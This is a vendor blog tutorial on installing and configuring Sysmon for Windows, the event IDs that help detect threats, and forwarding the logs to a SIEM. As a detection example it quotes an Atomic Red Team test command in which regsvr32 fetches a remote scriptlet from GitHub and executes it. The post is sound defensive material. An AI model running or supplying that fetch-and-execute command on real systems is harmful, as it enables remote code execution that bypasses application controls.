April 29, 2020

How To Download, Install, and Configure Sysmon for Windows

In addition to the default built-in logging that Windows Server offers, there are also additional configuration options and software that can be added to increase the visibility of your environment. In addition to enabling Windows Advanced Auditing, System Monitor (Sysmon) is one of the most commonly used add-ons for Windows logging. With Sysmon, you can detect malicious activity by tracking code behavior and network traffic, as well as create detections based on the malicious activity.

Sysmon is part of the Sysinternals software package, now owned by Microsoft and enriches the standard Windows logs by producing some higher level monitoring of events such as process creations, network connections and changes to the file system. It is extremely easy to install and deploy. Following these steps will turn on an incredible amount of logging.

Learn more about the benefits of Sysmon>

Downloading and Installing Sysmon

You can run a Poshim script to automatically install Sysmon, or you can install it manually:

To automatically install Sysmon using a Poshim script, follow these instructions.
To manually install Sysmon, follow the instructions below.

1. Download Sysmon (or entire Sysinternals suite)
2. Download your chosen configuration (we recommend Sysmon Modular)
3. Save as config.xml in c:\windows, or run the PowerShell command: Invoke-WebRequest -Uri https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml -OutFile C:\Windows\config.xml
4. Install by opening up a command prompt as administrator and typing sysmon64.exe –accepteula –i c:\windows\config.xml
  1. Sysmon.exe is for 32-bit systems only
  2. Sysmon64.exe is for 64-bit systems only

Sysmon download page from Microsoft Sysinternals

Configuring Sysmon Events to Detect Common Threats

There are several extremely helpful Windows Event IDs that Sysmon generates to help detect common threats in many different enterprises. A few examples of the more useful generated events for security purposes are listed below. A full list of Event IDs that Sysmon can generate are located on their download page.

If you need to access the Sysmon events locally as opposed to viewing them in a SIEM, you will find them in the event viewer under Applications and Services Logs > Microsoft > Windows > Sysmon.

Event ID 1 – Process Creation

Sysmon will not only show what processes are being run, it will also show when they are ended, as well as a lot of information about the executable or binary itself. It also provides hashes for all of the binaries that are run on the system and lists if they are signed or not, making it easy to see if malicious code is attempting to mimic legitimate programs such as PowerShell or other built-in Microsoft tools.

Sysmon installation command in Windows command prompt

Above, you can see the Registry Editor program being run. In certain cases when you are unable to have an allowlist-only environment, you can use events such as these to alert when processes are running, if they are signed by the appropriate vendor, or spawning processes that they shouldn’t be (such as MS Word spawning PowerShell).

Event ID 3 – Network Connection Detected

In this example, we can see where the Setup.exe has been run, by whom, as well as that it is reaching out to download additional content from a cloud provider. These events can be useful in detecting command and control traffic (which may indicate that attackers are sending commands that steal data, spread malware, etc.), as well as giving visibility into what applications are accessing certain internet resources.

Sysmon configuration XML file example

Event ID 4 – Sysmon Service State Changed

One potential action an attacker or malicious user could take is to disable the Sysmon service if they have the privileges to do so.

Sysmon configuration XML file example

Event ID 13 – Registry Value Set Events

Alerts on additions and modifications of certain registry locations can be beneficial for detecting malicious persistence on an endpoint. Many times entries are added to “Run” and “Run Once” on Windows so malware can resume its activities after a host is rebooted.

Sysmon event log entries in Windows Event Viewer

Event ID 22 – DNS Logging

There are several benefits to logging DNS traffic, such as finding malicious remote access tools, security misconfigurations and command and control traffic.

Sysmon configuration for process creation logging

Combining Events for Detection

Here we can see the popular Red Canary Atomic Red Team test for MITRE ATT&CK T1117 “Regsvr32” across several of the listed event IDs. Basically, regsvr32 can download and register DLLs (dynamic-link libraries) from URLs via the command line, something that is relatively easy to detect with Sysmon installed.

Event ID 1 shows:

- 1. ParentImage – C:\Windows\System32\cmd.exe
    - command prompt
  2. OriginalFileName – REGSVR32.EXE
    - Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.
  3. CommandLine – regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
    - Test attack from Atomic Red Team

Sysmon network connection monitoring settings

Event ID 3 Shows:

- 1. Image – C:\Windows\System32\regsvr32.exe
    - Regsvr32 is the application creating the network connection
  2. Destination Port Name – https
  3. Destination IP – 151.101.0.133

Sysmon file creation event configuration

Event ID 22 Shows:

- 1. Query Name – raw.githubusercontent.com
  2. Image Name – C:\Windows\System32\regsvr32.exe
    - Regsvr32 is the application requesting the DNS resolution of the location of the DLL on the internet

Sysmon registry modification detection settings

And when you tie them all together, you can create detections based on the malicious activity.

Click to Enlarge

Learn more about getting the most out of your Windows logging tools in “How to Optimize Windows Logging for Security,” and see how Blumira’s platform automatically detects and remediates security findings.

Sending Sysmon Events to Blumira

Once Sysmon is configured, you will need to add the Sysmon event channel to your NXLog configuration in order to start sending logs to Blumira’s platform for detection and response. You can use our latest version of Flowmira, or add the Sysmon route to your existing config. The latest version of Flowmira can be found here: https://github.com/Blumira/Flowmira/blob/master/nxlog.conf

Download Your Guide to Microsoft Security

To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.

In this guide, you’ll learn:

- - How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
  - How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
  - Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
  - What indicators of security threats you should be able to detect for Microsoft Azure and Office 365

Frequently Asked Questions

What Sysmon configuration should I start with?

Use SwiftOnSecurity's sysmon-config (available on GitHub) as your starting baseline. It filters out high-volume noise from trusted Windows processes while capturing the events that matter most for threat detection: process creation with full command lines, network connections to external IPs, file writes to sensitive directories, and registry modifications. Do not run Sysmon with a blank configuration, because it will log everything and overwhelm your event log within hours. After deploying the SwiftOnSecurity config, run it for a week and review what is generating the most volume. Tune out any legitimate applications that create excessive noise in your specific environment. Olaf Hartong's sysmon-modular is another good option if you want a config broken into individual detection modules that you can enable or disable independently.

Which Sysmon event IDs are most important for threat detection?

Focus on these six event IDs first. Event 1 (Process Creation) is the highest-value event because it captures the full command line, parent process, and user context for every new process, which is essential for detecting malicious PowerShell, LOLBins abuse, and suspicious executables. Event 3 (Network Connection) reveals outbound connections with destination IPs and ports, catching C2 callbacks. Event 7 (Image Loaded) detects DLL sideloading when attackers place malicious DLLs in application directories. Event 10 (Process Access) catches credential dumping tools accessing LSASS memory. Event 11 (File Create) logs new files written to disk, including malware drops and tools staged by attackers. Event 13 (Registry Value Set) catches persistence mechanisms like new Run keys or service registrations.

How do I deploy Sysmon across all domain machines using Group Policy?

Create a GPO with a startup script that handles installation and updates. Store the Sysmon installer (sysmon64.exe) and your configuration file (sysmonconfig.xml) on a SYSVOL share or another network share accessible to all domain computers. The startup script should check if Sysmon is already installed (sc query Sysmon64), install it if missing (sysmon64.exe -accepteula -i \\server\share\sysmonconfig.xml), and update the config if the version has changed (sysmon64.exe -c \\server\share\sysmonconfig.xml). Link the GPO to your target OUs. Test on a pilot OU first. The script runs at machine boot, so machines pick up the installation or config update on their next restart.

Does Sysmon slow down Windows machines?

With a properly tuned configuration, the performance impact is minimal on most workstations and servers. The SwiftOnSecurity config is specifically designed to exclude high-volume, low-value events. Performance problems come from overly broad configurations that log every DLL load (Event 7 without exclusions), every network connection (Event 3 without filtering), or every file creation (Event 11 globally). If you see performance degradation, check Sysmon Event 255, which logs when Sysmon itself encounters errors or drops events due to processing delays. Also monitor the size of the Sysmon event log channel. If it is growing faster than a few hundred MB per day on a workstation, your config needs tighter filtering.

How do I forward Sysmon events to a SIEM?

The most common methods are Windows Event Forwarding (WEF), which uses the built-in Windows event subscription mechanism to push events to a collector server, and log shipping agents like NXLog, Winlogbeat, or the Elastic Agent. For WEF, create a subscription on your collector that pulls events from the Microsoft-Windows-Sysmon/Operational channel on source machines. For agent-based collection, configure the agent to read that same channel and forward events to your SIEM endpoint. Blumira can ingest Sysmon events through its Windows agent and applies pre-built detection rules that map Sysmon event data to known attack patterns, so you get actionable alerts without writing custom correlation rules from scratch. Whichever method you choose, verify that events are flowing by checking your SIEM for recent Event ID 1 entries from test machines.

Tag(s): Security How-To , Blog , Microsoft Security

Amanda Berlin

Amanda Berlin is the Senior Product Manager of Cybersecurity at Blumira, bringing nearly two decades of experience to her position. At Blumira she leads a team of incident detection engineers who are responsible for creating new detections based on threat intelligence and research for the Blumira platform. An...